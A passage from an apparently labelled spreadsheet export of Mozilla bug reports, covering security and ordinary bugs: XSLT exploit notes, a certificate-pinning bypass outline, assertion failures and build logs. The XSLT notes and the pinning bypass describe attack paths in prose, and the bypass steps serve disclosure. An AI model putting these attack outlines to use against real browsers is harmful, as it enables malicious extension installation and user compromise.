  2 If the firefox process ends and then is restarted with the session
    restored, the requests pick right up from where they left off.
  3 If the recursion reaches a base case after the window is closed,
    Firefox appears to do some DOM processing. This can be tested by
    modifying 'exploit.xslt' to output an HTML file containing,
      &lt;link rel="prefetch" href="/test.png"&gt;
    upon reaching its base case. The server logs will display a request
    to 'test.png', even though the window was closed before processing
    the XSLT completed. It may be able to combine this bug with other
    bugs to produce other exploits at this point.
  4 The attacker can detect when the tab is closed since the pending 
    request is interrupted.
  5 The attacker may modify an in-progress computation by serving a
    different 'exploit.xsl?n=N' at a particular value of N. (I haven't
    explored this in much depth, yet.)
  6 This bug is exploitable with javascript disabled (unsurprising from
    a technical perspective, but given the possible attacks, probably
    surprising from a user's perspective).</t>
        </is>
      </c>
      <c r="X6248" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6249">
      <c r="A6249" t="n">
        <v>532730</v>
      </c>
      <c r="B6249" t="inlineStr">
        <is>
          <t>2009-12-03 12:49:39 -0800</t>
        </is>
      </c>
      <c r="C6249" t="inlineStr">
        <is>
          <t>###!!! ASSERTION: Caller forgot to check ReadyToExecuteScripts()</t>
        </is>
      </c>
      <c r="D6249" t="inlineStr">
        <is>
          <t>2010-09-27 18:18:48 -0700</t>
        </is>
      </c>
      <c r="E6249" t="n">
        <v>1</v>
      </c>
      <c r="F6249" t="n">
        <v>1</v>
      </c>
      <c r="G6249" t="n">
        <v>3</v>
      </c>
      <c r="H6249" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6249" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6249" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K6249" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L6249" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6249" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6249" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6249" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6249" t="inlineStr">
        <is>
          <t>[3.6.x][sg:critical?][critsmash:resolved][qa-examined-191]</t>
        </is>
      </c>
      <c r="Q6249" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6249" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S6249" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6249" t="n">
        <v>1</v>
      </c>
      <c r="U6249" t="n">
        <v>0</v>
      </c>
      <c r="V6249" t="n">
        <v>45</v>
      </c>
      <c r="W6249" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.7pre) Gecko/20091203 Shiretoko/3.5.7pre
Build Identifier: Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.7pre) Gecko/20091203 Shiretoko/3.5.7pre
While trying to get a website working with Firefox (using Greasemonkey to inject proper JavaScript -- the whole site is written with IE6-specific gunk) I ran into a problem where Firefox deadlocks attempting to run scripts on the page.
Unfortunately, the website in question is the HR site for my employer.  I'm unable to provide credentials for login.  I'll try to get a local copy of the HTML+Scripts, just to see if I can reproduce the deadlock without logging into the actual server.
I built Firefox from mozilla-1.9.1 repository today with debugging symbols enabled and loaded it into GDB.  There is a spew of console output, the following lines repeated indefinitely:
&gt; ###!!! ASSERTION: Caller forgot to check ReadyToExecuteScripts(): 'ReadyToExecuteScripts() &amp;&amp; nsContentUtils::IsSafeToRunScript()', file /home/osterj/other-projects/mozilla-1.9.1/content/base/src/nsScriptLoader.cpp, line 585
&gt; ###!!! ASSERTION: Inner window detected in Equality hook!: 'win-&gt;IsOuterWindow()', file /home/osterj/other-projects/mozilla-1.9.1/dom/src/base/nsDOMClassInfo.cpp, line 6653
&gt; ###!!! ASSERTION: Inner window detected in Equality hook!: 'other-&gt;IsOuterWindow()', file /home/osterj/other-projects/mozilla-1.9.1/dom/src/base/nsDOMClassInfo.cpp, line 6659
At some point, the "Unresponsive Script" dialog opens, but it is completely empty.  The dialog contains no controls (!) and sometimes even no title. The assertion spews in the console are still dumping at this point.  -&gt; Mandatory kill.
I have a simple backtrace from halting the process during the assertion spew.  Will attach.
Reproducible: Always</t>
        </is>
      </c>
      <c r="X6249" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6250">
      <c r="A6250" t="n">
        <v>816489</v>
      </c>
      <c r="B6250" t="inlineStr">
        <is>
          <t>2012-11-29 06:01:12 -0800</t>
        </is>
      </c>
      <c r="C6250" t="inlineStr">
        <is>
          <t>Disable leak checks for webrtc mochitests</t>
        </is>
      </c>
      <c r="D6250" t="inlineStr">
        <is>
          <t>2012-12-01 09:18:47 -0800</t>
        </is>
      </c>
      <c r="E6250" t="n">
        <v>1</v>
      </c>
      <c r="F6250" t="n">
        <v>1</v>
      </c>
      <c r="G6250" t="n">
        <v>3</v>
      </c>
      <c r="H6250" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6250" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6250" t="inlineStr">
        <is>
          <t>WebRTC</t>
        </is>
      </c>
      <c r="K6250" t="inlineStr">
        <is>
          <t>20 Branch</t>
        </is>
      </c>
      <c r="L6250" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6250" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6250" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6250" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6250" t="inlineStr">
        <is>
          <t>[WebRTC][do not merge to m-c!!][qa-]</t>
        </is>
      </c>
      <c r="Q6250" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6250" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S6250" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6250" t="n">
        <v>1</v>
      </c>
      <c r="U6250" t="n">
        <v>0</v>
      </c>
      <c r="V6250" t="n">
        <v>4</v>
      </c>
      <c r="W6250" t="inlineStr">
        <is>
          <t>Mochitests for WebRTC are leaking a lot at the moment. Given that we want to run the mochitests I have started to create on the alder branch, we have to disable leak checks. 
Keep in mind that this bug should never be merged to mozilla-central!
Once bug 812648 and all its dependencies have been fixed, we can backout this patch.</t>
        </is>
      </c>
      <c r="X6250" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6251">
      <c r="A6251" t="n">
        <v>922009</v>
      </c>
      <c r="B6251" t="inlineStr">
        <is>
          <t>2013-09-30 02:34:21 -0700</t>
        </is>
      </c>
      <c r="C6251" t="inlineStr">
        <is>
          <t>MOZ_CRASH when trying to transplant objects with same-compartment security wrappers</t>
        </is>
      </c>
      <c r="D6251" t="inlineStr">
        <is>
          <t>2016-06-04 12:43:49 -0700</t>
        </is>
      </c>
      <c r="E6251" t="n">
        <v>1</v>
      </c>
      <c r="F6251" t="n">
        <v>1</v>
      </c>
      <c r="G6251" t="n">
        <v>3</v>
      </c>
      <c r="H6251" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6251" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6251" t="inlineStr">
        <is>
          <t>XPConnect</t>
        </is>
      </c>
      <c r="K6251" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6251" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M6251" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N6251" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6251" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6251" t="inlineStr">
        <is>
          <t>[embargo until B2G 1.1 EOL][adv-main26+][adv-esr24.2+]</t>
        </is>
      </c>
      <c r="Q6251" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6251" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6251" t="inlineStr">
        <is>
          <t>mozilla27</t>
        </is>
      </c>
      <c r="T6251" t="n">
        <v>1</v>
      </c>
      <c r="U6251" t="n">
        <v>0</v>
      </c>
      <c r="V6251" t="n">
        <v>34</v>
      </c>
      <c r="W6251" t="inlineStr">
        <is>
          <t>See bug 921454 comment 5.
I'm going to use this bug to track the security issue here (since this is what we'll end up landing on all branches), and mark bug 921454 sec-other.</t>
        </is>
      </c>
      <c r="X6251" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6252">
      <c r="A6252" t="n">
        <v>846838</v>
      </c>
      <c r="B6252" t="inlineStr">
        <is>
          <t>2013-03-01 10:41:30 -0800</t>
        </is>
      </c>
      <c r="C6252" t="inlineStr">
        <is>
          <t>[traceback] MultipleObjectsReturned: get() returned more than one Category -- it returned 2! Lookup parameters were {'slug': u'modern'}</t>
        </is>
      </c>
      <c r="D6252" t="inlineStr">
        <is>
          <t>2016-02-04 14:51:37 -0800</t>
        </is>
      </c>
      <c r="E6252" t="n">
        <v>1</v>
      </c>
      <c r="F6252" t="n">
        <v>1</v>
      </c>
      <c r="G6252" t="n">
        <v>6</v>
      </c>
      <c r="H6252" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I6252" t="inlineStr">
        <is>
          <t>addons.mozilla.org Graveyard</t>
        </is>
      </c>
      <c r="J6252" t="inlineStr">
        <is>
          <t>Public Pages</t>
        </is>
      </c>
      <c r="K6252" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6252" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6252" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6252" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O6252" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6252" t="inlineStr"/>
      <c r="Q6252" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6252" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6252" t="inlineStr">
        <is>
          <t>2013-03-14</t>
        </is>
      </c>
      <c r="T6252" t="n">
        <v>1</v>
      </c>
      <c r="U6252" t="n">
        <v>0</v>
      </c>
      <c r="V6252" t="n">
        <v>3</v>
      </c>
      <c r="W6252" t="inlineStr">
        <is>
          <t>steps to reproduce:
1. Load https://addons-dev.allizom.org/ga-IE/firefox/complete-themes/modern
traceback details:
Stacktrace (most recent call last):
(1 additional frame(s) were not displayed)
...
  File "browse/views.py", line 147, in themes
    category = get_object_or_404(q, slug=category)
MultipleObjectsReturned: get() returned more than one Category -- it returned 2! Lookup parameters were {'slug': u'modern'}
sentry: 
http://sentry.dmz.phx1.mozilla.com/addons/addons-dev/group/11943/
Doesn't traceback on production</t>
        </is>
      </c>
      <c r="X6252" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6253">
      <c r="A6253" t="n">
        <v>1303127</v>
      </c>
      <c r="B6253" t="inlineStr">
        <is>
          <t>2016-09-15 12:14:41 -0700</t>
        </is>
      </c>
      <c r="C6253" t="inlineStr">
        <is>
          <t>ESR-45/Tor Browser certificate pinning bypass for addons.mozilla.org and other built-in sites</t>
        </is>
      </c>
      <c r="D6253" t="inlineStr">
        <is>
          <t>2016-09-21 15:54:36 -0700</t>
        </is>
      </c>
      <c r="E6253" t="n">
        <v>1</v>
      </c>
      <c r="F6253" t="n">
        <v>1</v>
      </c>
      <c r="G6253" t="n">
        <v>3</v>
      </c>
      <c r="H6253" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6253" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6253" t="inlineStr">
        <is>
          <t>Security: PSM</t>
        </is>
      </c>
      <c r="K6253" t="inlineStr">
        <is>
          <t>45 Branch</t>
        </is>
      </c>
      <c r="L6253" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M6253" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N6253" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6253" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6253" t="inlineStr"/>
      <c r="Q6253" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6253" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6253" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6253" t="n">
        <v>1</v>
      </c>
      <c r="U6253" t="n">
        <v>0</v>
      </c>
      <c r="V6253" t="n">
        <v>29</v>
      </c>
      <c r="W6253" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Linux; Android 5.0.2; LG-D415 Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.105 Mobile Safari/537.36
Steps to reproduce:
Write a malicious extension to be payload. Have it signed by Mozilla using their automated process. Generate a forged certificate for addons.mozilla.org that validates up through any CA built in to the Firefox certificate store. MiTM traffic to addons.mozilla.org trying to update NoScript or HTTPS Everywhere. Serve your malicious extension instead of the requested update to the target. 
http://seclists.org/dailydave/2016/q3/51
Actual results:
Said "certificate issuer is not built-in", obviously not failing due to pinning reinforcement.
Expected results:
Should have said "failed to validate pinned certificate." Mozilla doesn't use normal HPKP for certs related to their operations (like addons.mozilla.org. Mozilla using a form of static key pinning. Validations weaknesses limited to statically pinned certs.</t>
        </is>
      </c>
      <c r="X6253" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6254">
      <c r="A6254" t="n">
        <v>480598</v>
      </c>
      <c r="B6254" t="inlineStr">
        <is>
          <t>2009-02-27 12:04:51 -0800</t>
        </is>
      </c>
      <c r="C6254" t="inlineStr">
        <is>
          <t>update ru changeset for b3</t>
        </is>
      </c>
      <c r="D6254" t="inlineStr">
        <is>
          <t>2009-03-03 16:45:32 -0800</t>
        </is>
      </c>
      <c r="E6254" t="n">
        <v>1</v>
      </c>
      <c r="F6254" t="n">
        <v>1</v>
      </c>
      <c r="G6254" t="n">
        <v>2</v>
      </c>
      <c r="H6254" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I6254" t="inlineStr">
        <is>
          <t>Mozilla Localizations</t>
        </is>
      </c>
      <c r="J6254" t="inlineStr">
        <is>
          <t>ru / Russian</t>
        </is>
      </c>
      <c r="K6254" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6254" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6254" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6254" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6254" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6254" t="inlineStr"/>
      <c r="Q6254" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6254" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6254" t="inlineStr">
        <is>
          <t>mozilla1.9.1b3</t>
        </is>
      </c>
      <c r="T6254" t="n">
        <v>1</v>
      </c>
      <c r="U6254" t="n">
        <v>0</v>
      </c>
      <c r="V6254" t="n">
        <v>9</v>
      </c>
      <c r="W6254" t="inlineStr">
        <is>
          <t>Axel wanted to look at the changes here, but want to get this to pick up the Yandex change completely for b3.</t>
        </is>
      </c>
      <c r="X6254" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6255">
      <c r="A6255" t="n">
        <v>700905</v>
      </c>
      <c r="B6255" t="inlineStr">
        <is>
          <t>2011-11-08 19:06:47 -0800</t>
        </is>
      </c>
      <c r="C6255" t="inlineStr">
        <is>
          <t>Tracking bug for build and release of Firefox/Fennec 9.0b4</t>
        </is>
      </c>
      <c r="D6255" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E6255" t="n">
        <v>1</v>
      </c>
      <c r="F6255" t="n">
        <v>1</v>
      </c>
      <c r="G6255" t="n">
        <v>5</v>
      </c>
      <c r="H6255" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I6255" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J6255" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K6255" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L6255" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M6255" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N6255" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6255" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6255" t="inlineStr">
        <is>
          <t>week of the 28th</t>
        </is>
      </c>
      <c r="Q6255" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R6255" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6255" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6255" t="n">
        <v>1</v>
      </c>
      <c r="U6255" t="n">
        <v>0</v>
      </c>
      <c r="V6255" t="n">
        <v>7</v>
      </c>
      <c r="W6255" t="inlineStr">
        <is>
          <t>Waiting for "go to build".</t>
        </is>
      </c>
      <c r="X6255" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6256">
      <c r="A6256" t="n">
        <v>745494</v>
      </c>
      <c r="B6256" t="inlineStr">
        <is>
          <t>2012-04-14 17:15:57 -0700</t>
        </is>
      </c>
      <c r="C6256" t="inlineStr">
        <is>
          <t>"ASSERTION: Didn't restore state properly?"</t>
        </is>
      </c>
      <c r="D6256" t="inlineStr">
        <is>
          <t>2020-03-11 05:18:04 -0700</t>
        </is>
      </c>
      <c r="E6256" t="n">
        <v>1</v>
      </c>
      <c r="F6256" t="n">
        <v>1</v>
      </c>
      <c r="G6256" t="n">
        <v>3</v>
      </c>
      <c r="H6256" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6256" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6256" t="inlineStr">
        <is>
          <t>DOM: Editor</t>
        </is>
      </c>
      <c r="K6256" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L6256" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M6256" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N6256" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O6256" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6256" t="inlineStr">
        <is>
          <t>[sg:critical][qa+][advisory-tracking+]</t>
        </is>
      </c>
      <c r="Q6256" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6256" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6256" t="inlineStr">
        <is>
          <t>mozilla14</t>
        </is>
      </c>
      <c r="T6256" t="n">
        <v>1</v>
      </c>
      <c r="U6256" t="n">
        <v>0</v>
      </c>
      <c r="V6256" t="n">
        <v>21</v>
      </c>
      <c r="W6256" t="inlineStr">
        <is>
          <t>Created attachment 615089
testcase (requires focus)
###!!! ASSERTION: Please remove this from the document properly: '!IsInDoc()', file content/base/src/nsGenericElement.cpp, line 2509
This assertion is covered by bug 718282.
###!!! ASSERTION: Didn't restore state properly?: 'mSubtreeRoot == this', file content/base/src/nsGenericElement.cpp, line 210
This assertion was added in bug 730587.</t>
        </is>
      </c>
      <c r="X6256" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6257">
      <c r="A6257" t="n">
        <v>1506493</v>
      </c>
      <c r="B6257" t="inlineStr">
        <is>
          <t>2018-11-11 17:09:39 -0800</t>
        </is>
      </c>
      <c r="C6257" t="inlineStr">
        <is>
          <t>Perma fail ccov make[4]: *** [force-cargo-library-build] Error 101 after recipe for target 'force-cargo-library-build' failed</t>
        </is>
      </c>
      <c r="D6257" t="inlineStr">
        <is>
          <t>2018-11-19 09:38:05 -0800</t>
        </is>
      </c>
      <c r="E6257" t="n">
        <v>1</v>
      </c>
      <c r="F6257" t="n">
        <v>1</v>
      </c>
      <c r="G6257" t="n">
        <v>7</v>
      </c>
      <c r="H6257" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I6257" t="inlineStr">
        <is>
          <t>Firefox Build System</t>
        </is>
      </c>
      <c r="J6257" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K6257" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6257" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M6257" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N6257" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6257" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6257" t="inlineStr"/>
      <c r="Q6257" t="inlineStr">
        <is>
          <t>P5</t>
        </is>
      </c>
      <c r="R6257" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6257" t="inlineStr">
        <is>
          <t>mozilla65</t>
        </is>
      </c>
      <c r="T6257" t="n">
        <v>1</v>
      </c>
      <c r="U6257" t="n">
        <v>0</v>
      </c>
      <c r="V6257" t="n">
        <v>6</v>
      </c>
      <c r="W6257" t="inlineStr">
        <is>
          <t>Filed by: ccoroiu [at] mozilla.com
https://treeherder.mozilla.org/logviewer.html#?job_id=211104922&amp;repo=mozilla-central
https://queue.taskcluster.net/v1/task/enEA65r-SBWyxU3K-OdZNA/runs/0/artifacts/public/logs/live_backing.log
[task 2018-11-11T21:58:25.985Z] 21:58:25     INFO -  error: Could not compile `hashglobe`.
[task 2018-11-11T21:58:25.985Z] 21:58:25     INFO -  Caused by:
[task 2018-11-11T21:58:25.985Z] 21:58:25     INFO -    process didn't exit successfully: `/builds/worker/workspace/build/src/rustc/bin/rustc --crate-name hashglobe servo/components/hashglobe/src/lib.rs --color never --crate-type lib --emit=dep-info,link -C opt-level=1 -C panic=abort -C debuginfo=2 -C debug-assertions=on -C metadata=6609d1aea26cd6c3 -C extra-filename=-6609d1aea26cd6c3 --out-dir /builds/worker/workspace/build/src/obj-firefox/x86_64-apple-darwin/debug/deps --target x86_64-apple-darwin -C linker=/builds/worker/workspace/build/src/build/cargo-linker -L dependency=/builds/worker/workspace/build/src/obj-firefox/x86_64-apple-darwin/debug/deps -L dependency=/builds/worker/workspace/build/src/obj-firefox/debug/deps --extern libc=/builds/worker/workspace/build/src/obj-firefox/x86_64-apple-darwin/debug/deps/liblibc-3c2a7fc04a2d3183.rlib -C opt-level=2 -C debuginfo=2 -Ccodegen-units=1 -Zprofile -Zno-landing-pads` (exit code: 1)
[task 2018-11-11T21:58:25.986Z] 21:58:25     INFO -  warning: build failed, waiting for other jobs to finish...
[task 2018-11-11T21:58:25.986Z] 21:58:25     INFO -       Running `/builds/worker/workspace/build/src/rustc/bin/rustc --crate-name atty /builds/worker/workspace/build/src/third_party/rust/atty/src/lib.rs --color never --crate-type lib --emit=dep-info,link -C opt-level=1 -C panic=abort -C debuginfo=2 -C debug-assertions=on -C metadata=2913086f3a5713ed -C extra-filename=-2913086f3a5713ed --out-dir /builds/worker/workspace/build/src/obj-firefox/x86_64-apple-darwin/debug/deps --target x86_64-apple-darwin -C linker=/builds/worker/workspace/build/src/build/cargo-linker -L dependency=/builds/worker/workspace/build/src/obj-firefox/x86_64-apple-darwin/debug/deps -L dependency=/builds/worker/workspace/build/src/obj-firefox/debug/deps --extern libc=/builds/worker/workspace/build/src/obj-firefox/x86_64-apple-darwin/debug/deps/liblibc-3c2a7fc04a2d3183.rlib --cap-lints warn -C opt-level=2 -C debuginfo=2 -Ccodegen-units=1 -Zprofile -Zno-landing-pads`
[task 2018-11-11T21:58:25.986Z] 21:58:25     INFO -  error: build failed
[task 2018-11-11T21:58:25.986Z] 21:58:25     INFO -  /builds/worker/workspace/build/src/config/rules.mk:1051: recipe for target 'force-cargo-library-build' failed
[task 2018-11-11T21:58:25.986Z] 21:58:25     INFO -  make[4]: *** [force-cargo-library-build] Error 101
[task 2018-11-11T21:58:25.986Z] 21:58:25     INFO -  make[4]: Leaving directory '/builds/worker/workspace/build/src/obj-firefox/toolkit/library/gtest/rust'
[task 2018-11-11T21:58:25.986Z] 21:58:25     INFO -  /builds/worker/workspace/build/src/config/recurse.mk:74: recipe for target 'toolkit/library/gtest/rust/target' failed
[task 2018-11-11T21:58:25.986Z] 21:58:25     INFO -  make[3]: *** [toolkit/library/gtest/rust/target] Error 2
[task 2018-11-11T21:58:25.986Z] 21:58:25     INFO -  make[3]: *** Waiting for unfinished jobs....
[task 2018-11-11T21:58:25.986Z] 21:58:25     INFO -  make[4]: Entering directory '/builds/worker/workspace/build/src/obj-firefox/media/libjpeg'
[task 2018-11-11T21:58:25.986Z] 21:58:25     INFO -  /builds/worker/workspace/build/src/clang/bin/clang -target x86_64-apple-darwin11 -B /builds/worker/workspace/build/src/cctools/bin -isysroot /builds/worker/workspace/build/src/MacOSX10.11.sdk -std=gnu99 -o jccolor.o -c  -fvisibility=hidden -fvisibility-inlines-hidden -DDEBUG=1 -DSTATIC_EXPORTABLE_JS_API -DMOZ_HAS_MOZGLUE -DMOZILLA_INTERNAL_API -DIMPL_LIBXUL -I/builds/worker/workspace/build/src/media/libjpeg -I/builds/worker/workspace/build/src/obj-firefox/media/libjpeg -I/builds/worker/workspace/build/src/obj-firefox/dist/include -I/builds/worker/workspace/build/src/obj-firefox/dist/include/nspr -I/builds/worker/workspace/build/src/obj-firefox/dist/include/nss -fPIC -include /builds/worker/workspace/build/src/obj-firefox/mozilla-config.h -DMOZILLA_CLIENT -Qunused-arguments -U_FORTIFY_SOURCE -D_FORTIFY_SOURCE=2 -coverage -Xclang -coverage-no-function-names-in-data -U_FORTIFY_SOURCE -D_FORTIFY_SOURCE=2 -fno-strict-aliasing -ffunction-sections -fdata-sections -fno-math-errno -pthread -pipe -g -Xclang -load -Xclang /builds/worker/workspace/build/src/obj-firefox/build/clang-plugin/libclang-plugin.so -Xclang -add-plugin -Xclang moz-check -O3 -fno-omit-frame-pointer -funwind-tables -Qunused-arguments -Wall -Wempty-body -Wignored-qualifiers -Wpointer-arith -Wshadow-field-in-constructor-modified -Wsign-compare -Wtype-limits -Wunreachable-code -Wunreachable-code-return -Wclass-varargs -Wfloat-overflow-conversion -Wfloat-zero-conversion -Wloop-analysis -Wstring-conversion -Wtautological-overlap-compare -Wtautological-unsigned-enum-zero-compare -Wtautological-unsigned-zero-compare -Wno-error=deprecated-declarations -Wno-error=array-bounds -Wno-error=return-std-move -Wno-error=atomic-alignment -Wformat -Wformat-security -Wno-gnu-zero-variadic-macro-arguments  -MD -MP -MF .deps/jccolor.o.pp   /builds/worker/workspace/build/src/media/libjpeg/jccolor.c
[task 2018-11-11T21:58:25.987Z] 21:58:25     INFO -  make[4]: Leaving directory '/builds/worker/workspace/build/src/obj-firefox/media/libjpeg'
[task 2018-11-11T21:58:25.987Z] 21:58:25     INFO -  make[4]: Entering directory '/builds/worker/workspace/build/src/obj-firefox/config/external/icu/i18n'
[task 2018-11-11T21:58:25.987Z] 21:58:25     INFO -  make[4]: Leaving directory '/builds/worker/workspace/build/src/obj-firefox/config/external/icu/i18n'
[task 2018-11-11T21:58:25.987Z] 21:58:25     INFO -  make[4]: Entering directory '/builds/worker/workspace/build/src/obj-firefox/media/libjpeg'
[task 2018-11-11T21:58:25.987Z] 21:58:25     INFO -  make[4]: Leaving directory '/builds/worker/workspace/build/src/obj-firefox/media/libjpeg'
[task 2018-11-11T21:58:25.987Z] 21:58:25     INFO -  make[4]: Entering directory '/builds/worker/workspace/build/src/obj-firefox/third_party/prio'
[task 2018-11-11T21:58:25.987Z] 21:58:25     INFO -  /builds/worker/workspace/build/src/clang/bin/clang -target x86_64-apple-darwin11 -B /builds/worker/workspace/build/src/cctools/bin -isysroot /builds/worker/workspace/build/src/MacOSX10.11.sdk -std=gnu99 -o mpi.o -c  -DDEBUG=1 -DPRIO_BUILD_LIBRARY -DSTATIC_EXPORTABLE_JS_API -DMOZ_HAS_MOZGLUE -DMOZILLA_INTERNAL_API -DIMPL_LIBXUL -I/builds/worker/workspace/build/src/third_party/prio -I/builds/worker/workspace/build/src/obj-firefox/third_party/prio -I/builds/worker/workspace/build/src/security/nss/lib/freebl/mpi -I/builds/worker/workspace/build/src/third_party/msgpack/include -I/builds/worker/workspace/build/src/third_party/prio/include -I/builds/worker/workspace/build/src/obj-firefox/dist/include -I/builds/worker/workspace/build/src/obj-firefox/dist/include/nspr -I/builds/worker/workspace/build/src/obj-firefox/dist/include/nss -fPIC -include /builds/worker/workspace/build/src/obj-firefox/mozilla-config.h -DMOZILLA_CLIENT -Qunused-arguments -U_FORTIFY_SOURCE -D_FORTIFY_SOURCE=2 -coverage -Xclang -coverage-no-function-names-in-data 